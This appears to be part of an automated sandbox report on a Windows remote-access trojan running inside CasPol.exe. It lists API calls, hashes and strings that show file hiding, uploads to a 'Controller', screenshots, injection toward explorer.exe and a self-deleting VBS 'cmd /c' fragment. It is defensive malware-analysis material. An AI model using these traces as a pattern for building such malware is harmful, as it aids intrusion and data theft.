                                                                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                              • _wcslen.LIBCMT ref: 0040BD54
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                              • _wcslen.LIBCMT ref: 0040BE34
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                              • API String ID: 1579085052-1280438975
                                                                              • Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                              • Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                              • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                              • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                              • _wcslen.LIBCMT ref: 0041B2DB
                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                              • GetLastError.KERNEL32 ref: 0041B313
                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                              • GetLastError.KERNEL32 ref: 0041B370
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                              • String ID: ?
                                                                              • API String ID: 3941738427-1684325040
                                                                              • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                              • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 3899193279-0
                                                                              • Opcode ID: 4dff80f9f2e6418a47ef4f1e3ec22160d27dda194db1b92759e52112f0dcc884
                                                                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                              • Opcode Fuzzy Hash: 4dff80f9f2e6418a47ef4f1e3ec22160d27dda194db1b92759e52112f0dcc884
                                                                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                              • API String ID: 1223786279-3931108886
                                                                              • Opcode ID: 58c85a797d0b0d51052fc17ae47431b6712fc9cdcd63165aa872d0404d50a504
                                                                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                              • Opcode Fuzzy Hash: 58c85a797d0b0d51052fc17ae47431b6712fc9cdcd63165aa872d0404d50a504
                                                                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                              • API String ID: 2490988753-744132762
                                                                              • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                              • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                              APIs
                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                              • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                              • ExitProcess.KERNEL32 ref: 0041CB74
                                                                              • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                              • String ID: Close
                                                                              • API String ID: 1657328048-3535843008
                                                                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                              • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                              • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$Info
                                                                              • String ID:
                                                                              • API String ID: 2509303402-0
                                                                              • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                              • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                              • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                              • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                              • API String ID: 1884690901-3066803209
                                                                              • Opcode ID: 1775096831c7832b04362d5365a21c36005818d65dadadce0cd3a8e403c71fb6
                                                                              • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                              • Opcode Fuzzy Hash: 1775096831c7832b04362d5365a21c36005818d65dadadce0cd3a8e403c71fb6
                                                                              • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                              APIs
                                                                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                              • _free.LIBCMT ref: 004500A6
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                              • _free.LIBCMT ref: 004500C8
                                                                              • _free.LIBCMT ref: 004500DD
                                                                              • _free.LIBCMT ref: 004500E8
                                                                              • _free.LIBCMT ref: 0045010A
                                                                              • _free.LIBCMT ref: 0045011D
                                                                              • _free.LIBCMT ref: 0045012B
                                                                              • _free.LIBCMT ref: 00450136
                                                                              • _free.LIBCMT ref: 0045016E
                                                                              • _free.LIBCMT ref: 00450175
                                                                              • _free.LIBCMT ref: 00450192
                                                                              • _free.LIBCMT ref: 004501AA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                              • String ID:
                                                                              • API String ID: 161543041-0
                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                              • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                              • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0041912D
                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                              • API String ID: 489098229-65789007
                                                                              • Opcode ID: 06a04559175442f09dd813b294bf46112564609e275a967295441f3fe0ce043b
                                                                              • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                              • Opcode Fuzzy Hash: 06a04559175442f09dd813b294bf46112564609e275a967295441f3fe0ce043b
                                                                              • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                              APIs
                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                              • API String ID: 1913171305-390638927
                                                                              • Opcode ID: 6d8cdf771420d98c490a7d990fc142cdd0567f39efc4d8d43d0c3b0d415d574d
                                                                              • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                              • Opcode Fuzzy Hash: 6d8cdf771420d98c490a7d990fc142cdd0567f39efc4d8d43d0c3b0d415d574d
                                                                              • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                              • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                              • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                              APIs
                                                                                • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                              • GetLastError.KERNEL32 ref: 00454A96
                                                                              • __dosmaperr.LIBCMT ref: 00454A9D
                                                                              • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                              • GetLastError.KERNEL32 ref: 00454AB3
                                                                              • __dosmaperr.LIBCMT ref: 00454ABC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                              • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                              • GetLastError.KERNEL32 ref: 00454C58
                                                                              • __dosmaperr.LIBCMT ref: 00454C5F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                              • String ID: H
                                                                              • API String ID: 4237864984-2852464175
                                                                              • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                              • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                              • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                              • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 65535$udp
                                                                              • API String ID: 0-1267037602
                                                                              • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                              • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                              • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                              • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                              • __dosmaperr.LIBCMT ref: 004393CD
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                              • __dosmaperr.LIBCMT ref: 0043940A
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                              • __dosmaperr.LIBCMT ref: 0043945E
                                                                              • _free.LIBCMT ref: 0043946A
                                                                              • _free.LIBCMT ref: 00439471
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                              • String ID:
                                                                              • API String ID: 2441525078-0
                                                                              • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                              • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                              • API String ID: 2956720200-749203953
                                                                              • Opcode ID: 6f651fd5f109b797e8f598c57557918727e3d06f0053d4f4d1d309eb53a549ed
                                                                              • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                              • Opcode Fuzzy Hash: 6f651fd5f109b797e8f598c57557918727e3d06f0053d4f4d1d309eb53a549ed
                                                                              • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                              • String ID: <$@$@FG$@FG$Temp
                                                                              • API String ID: 1107811701-2245803885
                                                                              • Opcode ID: c1b60abd8b62dcba904cfb68a13a900497af3fb008715fd0d20885aad6260c29
                                                                              • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                              • Opcode Fuzzy Hash: c1b60abd8b62dcba904cfb68a13a900497af3fb008715fd0d20885aad6260c29
                                                                              • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentProcess
                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                              • API String ID: 2050909247-4145329354
                                                                              • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                              • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
